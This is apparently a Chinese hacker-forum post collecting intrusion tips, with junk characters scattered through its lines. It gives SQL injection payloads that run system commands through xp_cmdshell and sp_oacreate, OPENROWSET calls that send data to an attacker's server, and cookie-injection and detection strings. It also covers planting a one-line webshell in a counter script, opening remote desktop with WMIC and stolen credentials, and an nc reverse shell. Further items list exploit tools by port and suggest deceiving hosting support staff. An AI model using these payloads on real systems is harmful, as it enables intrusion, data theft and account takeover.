SA点数据库分离技术相关
}9 K6 d, t3 g) ^" E& v b
* V( f, D% a$ [6 B7 h @
' L" z5 v; B8 e9 uSA点数据库分离搞法+语句:4 S5 U7 u. M/ L/ K4 K, D& l( P
- ]3 P C- H" e4 z) Q: I( `! t3 J注射点不显错,执行下面三条语句页面都返回正常。" | x. K! h* A2 r1 D" o. B
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')$ O( F% C! M6 Z' |( k
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask'); V2 [5 o7 a. l; [7 B
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')+ r/ L4 v$ T- U% J0 Z
可以列目录,判断系统为2000,web与数据库分离" j" @3 y" {! s, ~& E+ u
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。" }; S3 V C. I) h, T$ H$ }! V
在注射点上执行
V* W7 ]# a* E/ _8 e1 jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--& s% s' l! M/ x# h5 X- d0 w; |4 t
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP! Z1 S" }2 n" I( F7 @) c2 ~
还有我用NC监听得其他端口都没有得到IP。
& d/ s7 m& Y# ^0 Y1 l8 |9 O @% A% u, ?3 _0 R* X
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
, K2 D0 \ ~; ?. x'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
4 K5 {9 f8 v Y) C ^1 j: S- X$ M/ B+ C
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--9 U) i' q' `, [- a8 G
" M T8 o- R; z1 g* N1 I
现在就猜想是不是数据库是内网而且不能连外网。
" B. x7 ]* v. y$ T; p+ G$ s$ R( |0 I. L
# I, W8 \1 H$ Y2 G& |9 O9 H/ X! N
access导出txt文本代码" u( [6 [2 N7 }, w6 s
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
4 Y9 p6 W7 [* H( ^# P- x: i' ?) [# C, z
1 F" y7 q. o: p
|4 g7 u; O2 S, A# g" K' G8 w6 ^自动跳转到指定网站代码头
' [: p( c4 ^* J; i! J1 ]<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>+ }7 c N" U& d- O! ~/ u% N
, E" Y6 t7 t k3 R/ j7 w; ?; z3 d
7 H) |: P1 o4 o7 o. X/ g
入侵java or jsp站点时默认配置文件路径:/ C3 M% q* i, \1 G
\web-inf\web.xml
8 |: L& D7 r( L6 d2 g$ r z/ rtomcat下的配置文件位置:# m4 v7 Q9 y7 ]( ?- I
\conf\server.xml (前面加上tomcat路径)
) B1 ^1 [0 ] G\Tomcat 5.0\webapps\root\web-inf\struts-config.xml3 R( ]7 _' `0 D4 v) ]
/ ~) }# z) z8 `- Z% D6 D0 o% ^4 W
4 k6 D9 f/ D/ e6 I
9 L/ {; C6 @% Z/ u
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:6 B% Y0 K. W1 G" a' w" L1 c# I
-1%230 a! V! L6 }% U) r7 h9 D
>
$ B) [6 G! l7 N$ F8 D. d" u<% p" P7 u& F* j9 M; N8 e
1'+or+'1'='11 P8 u+ W6 ~2 j" N; W5 y& S
id=8%bf
/ W& v* E4 f. C+ Z: @4 k2 n. Y
) s1 t1 L, F# K全新注入点检测试法:
1 j/ E* i+ o! W& E0 Q8 [! ? K在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。6 L& d8 {5 a `
2 e6 L; L0 [. S
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
% P$ t5 i( Y* m' n& F3 [, e; R @9 I2 I& \
搜索型注入判断方法:$ ?1 l6 T; q; `; R) @1 b
北京%' and '1'='1' and '%'='
9 Z8 Q4 f4 L# ~北京%' and '1'='2' and '%'='
3 H3 D) s5 p* p1 ]. c9 F9 H) M
: K! S) r# a6 b/ e
6 j W2 W2 `( b4 [- `COOKIES注入:$ ^5 j! Y) u; `2 W7 D9 {
/ Q% l) B) N* C! N
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
. K" j: k$ W5 J2 u$ s( z' e0 K) I' L" L8 s: M$ d
2000专业版查看本地登录用户命令:
4 r" F/ F, I+ d& N" Znet config workstation
% n' H" x# B/ ~6 Y/ P# q7 |- k8 a" o1 B1 x5 _# o" B" r g
4 R6 P1 K6 G+ {# _! n2003下查看ipsec配置和默认防火墙配置命令:
% I9 D7 b8 k" y3 I O* N0 H4 E- nnetsh firewall show config- R1 @ i8 Q: q. e3 k4 I; Y# B& Z
netsh ipsec static show all
! H8 g! u/ ~1 f- e
4 i* w0 C8 Y- m' R+ S* D1 d& _ w8 d不指派指定策略命令:
) a4 T0 w1 p) B) X/ Rnetsh ipsec static set policy name=test assign=n (test是不指派的策略名)
+ m+ B3 n! b& F2 _$ Qnetsh ipsec static show policy all 显示策略名
3 }2 M/ r) `: ~7 y3 B/ t9 f1 I$ ^
% Z' N. s/ n8 a' o6 X1 ~. C X- M' t; \( k, D
猜管理员后台小技巧:
9 C) B$ w1 |, h" ]9 B7 ]admin/left.asp
& Y8 A, c1 M0 W/ _! S- p3 r2 Dadmin/main.asp' U2 t% `, P2 U
admin/top.asp2 l# p: F& X# o, K
admin/admin.asp
6 n# `! C/ F% n) X会现出菜单导航,然后迅雷下载全部链接9 k. i& S' o4 A) m6 I- p# F
h$ I0 R7 @ x( i$ l2 d G! D& G% P) R6 m! R, L2 n& N& f1 m
社会工程学:2 [' w8 S a( j O7 i3 ?; c
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
% L( ~/ b ]8 R: ~然后去骗客服0 R$ d4 I7 H- s) W: ^6 ?0 F) M& B
6 v; A( C, K: U0 A8 n
, b. A9 f1 F0 k& D8 ]% U. E% G统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 8 F9 q5 P# o6 X' G/ }
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
7 m" w) Q/ b7 f 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。! K1 V" z7 q8 _0 C" t
3 L' r' E P0 C) V% R3 z, U
/ \/ u8 V% z! h5 d0 m. _7 ^
7 L6 n/ Z$ ~8 Q6 C! m, x3 Y6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)0 N5 @+ \2 L1 ~# Y* k
2 u7 L6 k3 V1 Y" Z) c# ^. L; w$ Q2 z' I2 \; b% [9 O: o0 q
4 n6 q2 ?3 K/ X$ j- _
CMD加密注册表位置
5 U1 l7 s* A, m! w+ u(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor/ c' I2 u, x/ _. W# x8 H
AutoRun" t: O" C8 y0 O/ O2 Y- [$ b' ?3 Y
7 s p4 t: ]( H; H8 {( _- O(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor7 @2 J. n8 \# d V& p
AutoRun
; v% i0 I7 K0 T4 X% ^ i1 K3 C1 `3 A
4 ^5 K- z. J4 |$ n. [# ^! g1 T* K
在找注入时搜索Hidden,把他改成test+ L0 |- m* t9 u; ^- l7 S( J
4 n" A* B8 [5 w: Y$ |( @
/ ?' ^& X! g# N4 W* [
7 [" H: d4 z% omstsc /v:IP /console ; Y$ V/ V; @+ G) U
4 V1 M1 ^" W8 |1 n5 i
4 N- R( q2 L) \; b" h) s1 R( K }& u8 L
一句话开3389:0 t* w) T2 W( a0 Z# y
) M' `: D4 I* e4 I k9 L
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> 8 e/ ?8 g3 j. t' k
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.& S/ k$ f) x% A# N0 U2 T
& q% a' t/ s5 ?2 {
! n% l k* ]* J: D( D& [; C知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
1 ?" X4 S* O1 t2 m' P( m2 D4 LInsert into admin(user,pwd) values('test','test')0 w% @9 w0 m3 i8 D* j3 m
2 T. l( \& ~ ^' q( D' b
1 w j/ c2 A, N6 m4 q. \6 A5 [" Z3 |NC反弹5 t" u, }' f+ V- R
先在本机执行: nc -vv -lp 监听的端口 (自己执行)
! s8 `, ]1 J+ x然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
0 K) }1 W3 i. F$ e4 I- r) X9 C6 h }4 `) B6 D! ~
1 ` j" ]: f! c7 W5 {在脚本入侵过程中要经常常试用%00来确认下参数是否有问题" L; q' [ R. a% R
! g* H R8 k7 |, e* k8 d有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
$ K' a O( |1 y) V& Q例如:
* H' T* S6 ?6 \subst k: d:\www\ 用d盘www目录替代k盘/ r4 T* R, l# x! j/ s, `
subst k: /d 解除K盘代替 |